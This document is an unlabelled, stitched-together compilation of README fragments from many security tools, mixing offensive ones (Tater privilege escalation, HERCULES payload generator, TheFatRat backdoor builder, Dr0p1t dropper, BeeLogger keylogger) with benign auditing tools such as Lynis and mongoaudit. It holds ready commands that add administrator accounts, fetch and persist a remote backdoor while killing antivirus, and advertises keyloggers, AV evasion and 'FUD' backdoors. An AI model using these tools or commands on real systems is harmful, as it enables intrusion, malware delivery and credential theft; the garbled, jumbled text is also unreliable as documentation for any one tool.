• p0wnedShell - https://github.com/Cn33liz/p0wnedShell
  
• PowerShell Empire - https://github.com/PowerShellEmpire/Empire
  
• PS>Attack - https://github.com/jaredhaight/psattack 

• The main Tater function.
  

• IP - Specify a specific local IP address. An IP address will be selected automatically if this parameter is not used.
  
• SpooferIP - Specify an IP address for NBNS spoofing. This is needed when using two hosts to get around an in-use port 80 on the privesc target.
  
• Command - Command to execute as SYSTEM on the localhost. Use PowerShell character escapes where necessary.
  
• NBNS - Default = Enabled: (Y/N) Enable/Disable NBNS bruteforce spoofing.
  
• NBNSLimit - Default = Enabled: (Y/N) Enable/Disable NBNS bruteforce spoofer limiting to stop NBNS spoofing while hostname is resolving correctly.
  
• ExhaustUDP - Default = Disabled: (Y/N) Enable/Disable UDP port exhaustion to force all DNS lookups to fail in order to fallback to NBNS resolution.
  
• HTTPPort - Default = 80: Specify a TCP port for the HTTP listener and redirect response.
  
• Hostname - Default = WPAD: Hostname to spoof. WPAD.DOMAIN.TLD may be required by Windows Server 2008.
  
• WPADDirectHosts - Comma separated list of hosts to list as direct in the wpad.dat file. Note that localhost is always listed as direct.
  
• WPADPort - Default = 80: Specify a proxy server port to be included in the wpad.dat file.
  
• Trigger - Default = 1: Trigger type to use in order to trigger HTTP to SMB relay. 0 = None, 1 = Windows Defender Signature Update, 2 = Windows 10 Webclient/Scheduled Task
  
• TaskDelete - Default = Enabled: (Y/N) Enable/Disable scheduled task deletion for trigger 2. If enabled, a random string will be added to the taskname to avoid failures after multiple trigger 2 runs.
  
• Taskname - Default = Tater: Scheduled task name to use with trigger 2. If you observe that Tater does not work after multiple trigger 2 runs, try changing the taskname.
  
• RunTime - Default = Unlimited: (Integer) Set the run time duration in minutes.
  
• ConsoleOutput - Default = Disabled: (Y/N) Enable/Disable real time console output. If using this option through a shell, test to ensure that it doesn't hang the shell.
  
• StatusOutput - Default = Enabled: (Y/N) Enable/Disable startup messages.
  
• ShowHelp - Default = Enabled: (Y/N) Enable/Disable the help messages at startup.
  
• Tool - Default = 0: (0,1,2) Enable/Disable features for better operation through external tools such as Metasploit's Interactive Powershell Sessions and Empire. 0 = None, 1 = Metasploit, 2 = Empire
  

• Function to manually stop Invoke-Tater.
  

• To import with Import-Module:
  Import-Module ./Tater.ps1
  
• To import using dot source method:
  . ./Tater.ps1
  

• Basic trigger 1 example
  Invoke-Tater -Trigger 1 -Command "net user tater Winter2016 /add && net localgroup administrators tater /add"
  
• Basic trigger 2 example
  Invoke-Tater -Trigger 2 -Command "net user tater Winter2016 /add && net localgroup administrators tater /add"
  
• Two system setup to get around port 80 being in-use on the privesc target
  WPAD System - 192.168.10.100 - this system will just serve up a wpad.dat file that will direct HTTP traffic on the privesc target to the non-80 HTTP port
  Invoke-Tater -Trigger 0 -NBNS N -WPADPort 8080 -Command "null"
  Privesc Target - 192.168.10.101
  Invoke-Tater -Command "net user Tater Winter2016 /add && net localgroup administrators Tater /add" -HTTPPort 8080 -SpooferIP 192.168.10.100
  

Usage: credmap.py --email EMAIL | --user USER | --load LIST [options]

Options:
  -h/--help             show this help message and exit
  -v/--verbose          display extra output information
  -u/--username=USER..  set the username to test with
  -p/--password=PASS..  set the password to test with
  -e/--email=EMAIL      set an email to test with
  -l/--load=LOAD_FILE   load list of credentials in format USER:PASSWORD
  -f/--format=CRED_F..  format to use when reading from file (e.g. u|e:p)
  -x/--exclude=EXCLUDE  exclude sites from testing
  -o/--only=ONLY        test only listed sites
  -s/--safe-urls        only test sites that use HTTPS.
  -i/--ignore-proxy     ignore system default HTTP proxy
  --proxy=PROXY         set proxy (e.g. "socks5://192.168.1.2:9050")
  --list                list available sites to test with

./credmap.py --username janedoe --email janedoe@email.com
./credmap.py -u johndoe -e johndoe@email.com --exclude "github.com, live.com"
./credmap.py -u johndoe -p abc123 -vvv --only "linkedin.com, facebook.com"
./credmap.py -e janedoe@example.com --verbose --proxy "https://127.0.0.1:8080"
./credmap.py --load creds.txt --format "e.u.p"
./credmap.py -l creds.txt -f "u|e:p"
./credmap.py -l creds.txt
./credmap.py --list

• Linux operating system
• Python3
• Python libraries requirements in requirements.txt

• GIT: Admin-Finder
• Aircrack-ng
• Airomon-ng
• Airodump-ng
• Airolib-ng
• Arp
• Arpspoof
• Beef
• Bettercap
• GIT: changeme
• CrackMapExec
• Create_ap
• Dig
• Dnsmap
• GIT: Dnsrecon
• GIT: Exploitdb
• GIT: Hashid
• Hostapd
• GIT: Instabot
• John the Ripper
• Nmap
• GIT: Routersploit
• SPARTA
• GIT: Spoofcheck
• GIT: XSSER

• core --> The core files with functions used all over the code
• files --> Static files, passwordlist, etc.
• logs --> Standard folder for saving logs into
• modules --> Containing the modules
• tmp --> Guess
• tools --> GIT tools
• www --> Files for the webserver

• Only python3 code
• Code needs to follow pep8 flake8 (no need for linebreak)

• More modules
• Interactive webinterface. Set settings and get results in the browser <-- sniffhttp and apsniff done
• Rename config.ini to config.ini.default to avoid overriding userspecific config file

• Proxychain
• Tor
• Threading on all BF
• Try/except on imports on modules for running with os.system
• Add run command with : in modules
• Add info about 'set para value' in modules (missing?!)
• Regenerate modules.xml (loop through modules)
• Design modules with core import and parser for design
• Check that there are enough credit to arthurs of tools, repos, etc.
• Split updatetools into local tools vs git
• When adding modules strip <> to ensuring XML format
• Change behavior of install and update tools
• Add invoke option inside all modules
• All modules - change options to Options
• Split files folder up into lists, etc
• Core network and wifi - merged?
• Original arthurs will be displayed below banner on modules. Todo.
• When showing modules indicate somehow what they require
• Set modules parameters in browser dialog
• Add args to all modules and create dialog HTML (automated tool in development)

• Do a run through config.ini and extract names for the updatecommand instead of DRY in two functions

• cleanup getLocalIP (local_ip) in functions
• PEP8/Flake8 for old modules

• SQLmap
• Sparta
• http sniff pwd <-- Done
• Evil Twin - deauth + info about unmanaging in NetworkManager
• Evil Twin - arg parse for landingpage / + logfunction
• monitor network auto
• xsser
• target attack website or ip
• system information
• dns fake
• grep, sed, awk
• scapy on all network activity
• Admin finder - checkout google/bing search before BF
• Changeme - Ztgrace
• Osint frame
• Bettercap modules. Implementation in other modules. Excellent performance.
• Create Access Point with hostapd and dnsmasq. Already implemented in Ewil Twin

 CalculateChecksum(x) : Function calculates x digit 8 bit checksum for reverse HTTP/HTTPS meterpreter connections, returns the calculated checksum as string.

 Meterpreter(ConType, Address) : Function launches a meterpreter connection, takes 2 parameters connection type (HTTP/HTTPS/TCP) and Address (127.0.0.1:4444), function returns a string for error handling.

 Persistence() : Function copys and adds the running binary to startup registry.

 Sysguide() : Function returns the current directory, running OS version, username, antivirus name as strings.

 Keylogger(LOGS) : Function takes a string pointer as parameter and starts a keylogger,all key logs are saved at given parameter.

 Please(Command) : Function executes the given parameter with runas command. (Asks permission for higher level operations)  

 BypassAV() : Function bypasses the anti virus heroustic detections, takes a integer as parameter for defining the intensity level.

 Dispatch(Base64_Binary,BinaryName, Parameters) : Function drops a binary and executes it, takes tree strings as parameter base64 encoded binary, binary name and parameters.

 Distract() : Functions execute a forkbomb bat file for distracting the user.

 Dos() : Function start a dos atack to given target (http://example.com)

 SyscallExecute(Shellcode) : Function executes the given shellcode(byte array) with system call.

 ThreadExecute(Shellcode) : Function executes the given shellcode(byte array) with CreateThread function.

 WifiList() : Functions returns he wifi connection history.

 #RSE#
 RSE stands for "Reduced Sized Exploits", functions under RSE folder are build with windows api calls for reducing payload sizes.

    go get github.com/fatih/color
    go run Setup.go

    HERCULES

    Persistence : Persistence function adds the running binary to windows start-up registry (CurrentVersion/Run) for continious access.

    Migration : This function triggers a loop that tries to migrate to a remote process until it is successfully migrated. 

    UPX (Ultimate Packer for Executables) is a free and open source executable packer supporting a number of file formats from different operating systems. UPX simply takes the binary file and compresses it, packed binary unpack(decompress) itself at runtime to memory.

    AV Evasion Score is a scale(1/10) for determining the effectiveness of the payloads anti virus bypassing capabilities, 1 represents low possibility to pass AV softwares.

    Using special functions and packing the payloads with upx decreases the AV Evasion Score.

• Binary infector
• Bypass AV functon
• AES payload encryption
• OSX support

1. Should not be written in an obfuscated language. These includes languages which are too low-level, which allow to access non-initialized variables, which don't differentiate between variables and functions/procedures, which start array indexes from arbitrary numbers, etc., etc. ScratchABit is written in Python (modern version, Python3) for your pleasure and sanity.
   
2. User interface framework should allow user interaction of the needed level, not add dependencies, bloat, issues, and incompatibilities between framework's versions. ScratchABit currently uses simple (no color even) full-screen text user interface, using ANSI/VT100 terminal escape sequences (yes, even curses library was deemed too bloat a dependency to force upon users).
   
3. Should leverage easy to use text formats to store "database", to facilitate easy reuse and tool writing, and storage in version control systems.
   

git clone --recursive https://github.com/pfalcon/ScratchABit

python3 ScratchABit.py example-elf

python3 ScratchABit.py example.def

• Currently uses multiple files for "database", each storing particular type of information. Switch to a single YAML file instead?
• Add color (low priority, (unbloated!) patches welcome).
• Few important UI commands to implement yet for comfortable work. ( All the most important commands should be there, other functionality is expected to be implemented using plugins).
• Offer to save DB on quit if modified.
• Git integration for DB saving.
• Improve robustness (add exception handler at the main loop level, don't abort the application, show to user/log and continue).
• Try to deal with code flow inconsistencies (e.g. within an instruction
  • low priority for intended usage) and data access inconsistencies (e.g. accessing individual bytes of previosly detected word - higher priority). (Improved in 1.4.)
• See how to support other types of IDAPython plugins besides just processor modules.
• Parse and use debugging information (e.g. DWARF) present in ELF (etc.) files.

Q: What processors/architectures are supported?

Q: I'm not on Linux, how can I run ScratchABit?

MTR screenshots

Compatibility

Compiling MTR

Binary distributions

• Ryan Weaver has been making RPMs for mtr. He puts them on his ftp site, which I mirror onto ftp://ftp.bitwizard.nl/mtr/rpms/ .
• kanedaaa builds slackware packages at: http://kaneda.bohater.net/slackware/packages/.
• The freeBSD team makes binaries at ftp://ftp.FreeBSD.org/pub/FreeBSD/ports/i386/packages-stable/net/ Substitute the correct packages-..-current if you are running a "-current" version. If anybody can tell me how I can get mirror to flatten the symlinks that they use, I'll mirror them here at BitWizard.
• The debian team makes binaries at ftp://ftp.debian.org/debian/dists/unstable/main/binary-i386/net/mtr_0.39-1.deb The mirror worked in 30 seconds, no problems there. So you can get the package from the BitWizard site too.
• Michael Collard no longer builds and maintains x64_64 binaries at: http://members.iinet.net.au/~quadfour/projects.html. (the link is dead. I don't expect Michael to still do this, If he does and you know the new location, tell me.)

Live on the web

http://bundler.io/

deftcode ~ $ gem install bundler

deftcode vsaudit $ bundle

deftcode vsaudit $ ruby vsaudit.rb

• Display the available options that can be set
• List the environment variables
• Get the value of environment variable
• Set or change the environment variables

• Check mistakes in the local configuration files
• Scan a local o remote network
• Enumerate the extensions
• Bruteforce extensions
• Get the live network traffic
• Intercept the network traffic by custom bpf

• Get informations about modules or address
• Show the report list
• Show the extensions list

• Display the help message
• Quit from the framework

• Manual: http://deftcode.ninja/post/vsaudit-voip-security-audit-framework
• RFC-3261 (SIP - Session Initiation Protocol): https://www.ietf.org/rfc/rfc3261.txt

• Checks for metasploit service and starts if not present
  
• Easily craft meterpreter reverse_tcp payloads for Windows, Linux, Android and Mac and another
  
• Start multiple meterpreter reverse_tcp listners
  
• Fast Search in searchsploit
  
• Bypass AV
  
• File pumper
  
• Create backdoor with another techniq
  
• Autorunscript for listeners ( easy to use )
  
• Drop into Msfconsole
  
• Some other fun stuff :)
  

• Autorun work if the victim disabled uac ( user acces control ) or low uac ( WINDOWS )
• What is uac ? you can visit ( http://www.digitalcitizen.life/uac-why-you-should-never-turn-it-off )
• I have also created 3 AutoRun files
• Simply copy these files to a CD or USB
• You can change the icon autorun file or exe in folder icon ( replace your another ico and replace name with autorun.ico )

• Copy your icon picture to folder /TheFatrat/icons
• Change the name into autorun.ico
• And Replace
• Done

1. git clone https://github.com/Screetsec/TheFatRat.git
2. cd TheFatRat/setup
3. chmod +x setup.sh && ./setup.sh

• Extract The lalin-master to your home or another folder
• chmod +x fatrat
• chmod +x powerfull.sh
• And run the tools ( ./fatrat )
• Easy to Use just input your number

• A linux operating system. We recommend Kali Linux 2 or Kali 2016.1 rolling / Cyborg / Parrot / Dracos / BackTrack / Backbox / and another operating system ( linux )
  
• Must install metasploit framework
  

• if prog.c file to large when create backdoor with powerfull.sh , you can use prog.c.backup and create another backup when you running option 2

• Screetsec Channel : https://www.youtube.com/channel/UCpK9IXzLMfVFp9NUfDzxFfw
• Udate thefatrat v1.8 https://youtu.be/6skLV6zPnec?list=PLbyfDadg3caj6nc3KBk375lKWDOjiCmb8
• file Pumper in linux with fatrat https://youtu.be/rHuh5DJ476M?list=PLbyfDadg3caj6nc3KBk375lKWDOjiCmb8
• Kali linux 2016.2 | Setup FatRat and Bypass Windows 10 : https://www.youtube.com/watch?v=mkfKSCxvPec
• Embed Backdoor Apk Andoird : https://www.youtube.com/watch?v=bZg3gPuLvgs&feature=youtu.be
• Create Backdoor Php and Reconnect With TheFatRat : https://www.youtube.com/watch?v=gfS55fjd8Fg
• THEFATRAT:BACKDOOR CREATOR & BYPASS ANTIVIRUS AND INSTALL. : https://www.youtube.com/watch?v=C4YHVKPw6Zo
• Exploit Windows 7/8/10 using Thefatrat ( option 2 ) : https://www.youtube.com/watch?v=-WbKOxIl_f4
• How to hack android device with FatRat on kali linux 2 : https://www.youtube.com/watch?v=yUuwnu-NUXE
• Kali Linux Tools - TheFatRat Tool For Generate Backdoor with MsfVenom : https://www.youtube.com/watch?v=7PMfPbrM0o4
• FUD 100 % Backdoor With TheFatRat pt.1 [ PwnWinds ] [ Bypass Antivirus ] : https://www.youtube.com/watch?v=8lJBwclFwJI
• FUD 100 % Backdoor With TheFatRat pt.2 [ PwnWinds ] [ Bypass Antivirus ] : https://www.youtube.com/watch?v=t7E6DZPhLLk&t=17s
• FUD 100 % Backdoor With TheFatRat pt.3 [ PwnWinds ] [ Bypass Antivirus ] : https://www.youtube.com/watch?v=wCzsD6vt9CQ
• TheFatrat Backdoor Undetectable by Antivirus Kali linux part 3 : https://www.youtube.com/watch?v=wuOCDn0NvWc
• 1000 % FUD Backdoor with TheFatRat Tool : https://www.youtube.com/watch?v=vPXWv0jaBEQ
• How To Use TheFatRat To Create Backdoor In Kali Rolling [FUD 100%] : https://www.youtube.com/watch?v=26tSOuPcpZk
• Backdoor (Virus) 100% Indetectable | TheFatRat : https://www.youtube.com/watch?v=26tSOuPcpZk
• Backdooring Android with TheFatRat Tool- Kali Linux Tutorial : https://www.youtube.com/watch?v=1SQW9lujjT8
• Hacking Windows using TheFatRat + Apache2 Server + Ettercap + Metasploit on Kali Linux 2016.2 https://www.youtube.com/watch?v=FlXMslSjnGw
• ALL VIDEO IN HERE : https://www.youtube.com/results?search_query=thefatrat+backdoor

• Submit new issue
• pm me
• Hey sup ? do you want ask about all my tools ? you can join me in telegram.me/offscreetsec

Credits

• Thanks to allah and Screetsec [ Edo -maland- ]
• Dracos Linux from Scratch Indonesia ( Penetration os ) Thanksyou , you can see in http://dracos-linux.org/
• Offensive Security for the awesome OS ( http://www.offensive-security.com/ )
• http://www.kali.org/ "
  
• Jack Wilder admin in http://www.linuxsec.org
• source for c program https://github.com/rsmudge
• And another open sources tool in github
• Uptodate new tools hacking visit http://www.kitploit.com

██╗    ██╗ █████╗ ███████╗██████╗  █████╗ ███████╗███████╗
██║    ██║██╔══██╗██╔════╝██╔══██╗██╔══██╗██╔════╝██╔════╝
██║ █╗ ██║███████║█████╗  ██████╔╝███████║███████╗███████╗
██║███╗██║██╔══██║██╔══╝  ██╔═══╝ ██╔══██║╚════██║╚════██║
╚███╔███╔╝██║  ██║██║     ██║     ██║  ██║███████║███████║
╚══╝╚══╝ ╚═╝  ╚═╝╚═╝     ╚═╝     ╚═╝  ╚═╝╚══════╝╚══════╝

                            WAFPASS - Copyright (c) 2017 Hamed Izadi (@hezd). 

  $ git clone https://github.com/wafpassproject/wafpass.git

• Linux
• Mac OS X
• Windows

  $ python3 wapfass.py -h

  payload@description

• QR
• Data Matrix
• Aztec
• Code 128

• Windows XP/7/8/10
• GNU/Linux
• MacOSX

• Multithreaded
• Keep alive connections
• Support for multiple extensions (-e|--extensions asp,php)
• Reporting (plain text, JSON)
• Heuristically detects invalid web pages
• Recursive brute forcing
• HTTP proxy support
• User agent randomization
• Batch processing

• example/
• example.%EXT%

• example/
• example.asp
• example.aspx

• 0.3.7 - 2016.08.22 Force extensions switch added.
• 0.3.6 - 2016.02.14 Bugfixes
• 0.3.5 - 2016.01.29 Improved heuristic, replaced urllib3 for requests, error logs, batch reports, user agent randomization, bugfixes
• 0.3.0 - 2015.02.05 Fixed issue3, fixed timeout exception, ported to Python3, other bugfixes
• 0.2.7 - 2014.11.21 Added Url List feature (-L). Changed output. Minor Fixes
• 0.2.6 - 2014.9.12 Fixed bug when dictionary size is greater than threads count. Fixed URL encoding bug (issue2).
• 0.2.5 - 2014.9.2 Shows Content-Length in output and reports, added default.conf file (for setting defaults) and report auto save feature added.
• 0.2.4 - 2014.7.17 Added Windows support, --scan-subdir|--scan-subdirs argument added, --exclude-subdir|--exclude-subdirs added, --header argument added, dirbuster dictionaries added, fixed some concurrency bugs, MVC refactoring
• 0.2.3 - 2014.7.7 Fixed some bugs, minor refactorings, exclude status switch, "pause/next directory" feature, changed help structure, expaded default dictionary
• 0.2.2 - 2014.7.2 Fixed some bugs, showing percentage of tested paths and added report generation feature
• 0.2.1 - 2014.5.1 Fixed some bugs and added recursive option
• 0.2.0 - 2014.1.31 Initial public release

• Works with Windows and Linux
• Adding malware after downloading it to startup
• Adding malware after downloading it to task scheduler
• Finding and killing the antivirus before running the malware
• Running a custom (batch|powershell|vbs) file you have choosen before running the malware
• In running powershell scripts it can bypass execution policy
• Using UPX to compress the dropper after creating it
• Choose an icon for the dropper after creating it

Usage: Dr0p1t.py Malware_Url [Options]

options:
  -h, --help   show this help message and exit
  -s           Add your malware to startup (Persistence)
  -t           Add your malware to task scheduler (Persistence)
  -k           Kill antivirus process before running your malware.
  -b           Run this batch script before running your malware. Check scripts folder
  -p           Run this powershell script before running your malware. Check scripts folder
  -v           Run this vbs script before running your malware. Check scripts folder
  --only32     Download your malware for 32 bit devices only
  --only64     Download your malware for 64 bit devices only
  --upx        Use UPX to compress the final file.
  -i           Use icon to the final file. Check icons folder.
  -q           Stay quite ( no banner )
  -u           Check for updates
  -nd          Display less output information

./Dr0p1t.py https://test.com/backdoor.exe -s -t -k --upx
./Dr0p1t.py https://test.com/backdoor.exe -k -b block_online_scan.bat --only32
./Dr0p1t.py https://test.com/backdoor.exe -s -t -k -p Enable_PSRemoting.ps1

• Python 3.x( prefered 3.5 )
• Python libraries requirements in requirements.txt

git clone https://github.com/D4Vinci/Dr0p1t-Framework

cd Dr0p1t-Framework
pip install -r requirements.txt
./Dr0p1t.py

cd Dr0p1t-Framework
pip install -r requirements.txt
pip install -r windows_requirements.txt
./Dr0p1t.py

• Python 2 support
• Work on UAC bypass
• Work on spreading on device and may be in lan too
• Injecting dr0pp3r to another program
• More modules

• Send logs each 120 seconds.
• Send logs when chars > 50.
• Send logs with gmail.
• Some Phishing methods are included.
• Multiple Session disabled.
• Bypass UAC.

• apt
• wine
• wget
• Linux
• sudo
• python2.7
• python 2.7 on Wine Machine
• pywin32 on Wine Machine
• pythoncom on Wine Machine

• Kali Linux - SANA
• Kali Linux - ROLLING
• Ubuntu 14.04-16.04 LTS
• Debian 8.5
• Linux Mint 18.1

git clone https://github.com/4w4k3/BeeLogger/.git

sudo python bee.py

sudo python2.7 bee.py

Installing with pip

pip install mongoaudit

Alternative installer

curl -s https://mongoaud.it/install | bash

Introduction

Supported tests

• MongoDB listens on a port different to default one
• Server only accepts connections from whitelisted hosts / networks
• MongoDB HTTP status interface is not accessible on port 28017
• MongoDB is not exposing its version number
• MongoDB version is newer than 2.4
• TLS/SSL encryption is enabled
• Authentication is enabled
• SCRAM-SHA-1 authentication method is enabled
• Server-side Javascript is forbidden
• Roles granted to the user only permit CRUD operations *
• The user has permissions over a single database *
• Security bug CVE-2015-7882
• Security bug CVE-2015-2705
• Security bug CVE-2014-8964
• Security bug CVE-2015-1609
• Security bug CVE-2014-3971
• Security bug CVE-2014-2917
• Security bug CVE-2013-4650
• Security bug CVE-2013-3969
• Security bug CVE-2012-6619
• Security bug CVE-2013-1892
• Security bug CVE-2013-2132

How can I best secure my MongoDB?

"With great power comes great responsibility"

• Never use this tool on servers you don't own. Unauthorized access to strangers' computer systems is a crime in many countries.
• Please use this tool is at your own risk. We will accept no liability for any loss or damage which you may incur no matter how caused.
• Don't be evil!

• AIX
• FreeBSD
• HP-UX
• Linux
• Mac OS
• NetBSD
• OpenBSD
• Solaris
• and others

1. Determine operating system
2. Search for available tools and utilities
3. Check for Lynis update
4. Run tests from enabled plugins
5. Run security tests per category
6. Report status of security scan

• Security auditing
• Compliance testing (e.g. PCI, HIPAA, SOx)
• Vulnerability detection and scanning
• System hardening

• Best practices
• CIS
• NIST
• NSA
• OpenSCAP data
• Vendor guides and recommendations (e.g. Debian Gentoo, Red Hat)

Lynis 2.4.3 (2017-02-22)

Changes:
--------
* Colored output can now be tuned with profile (colors=yes/no)
* Allow data upload to be set as a profile option

Tests:
------
* AUTH-9308 - Improved test for sulogin string
* MAIL-8818 - Test if Linux version is known before comparing in Postfix banner
* TIME-3116 - Skip stratum 16 items for time pools
* TIME-3148 - New test to detect TZ variable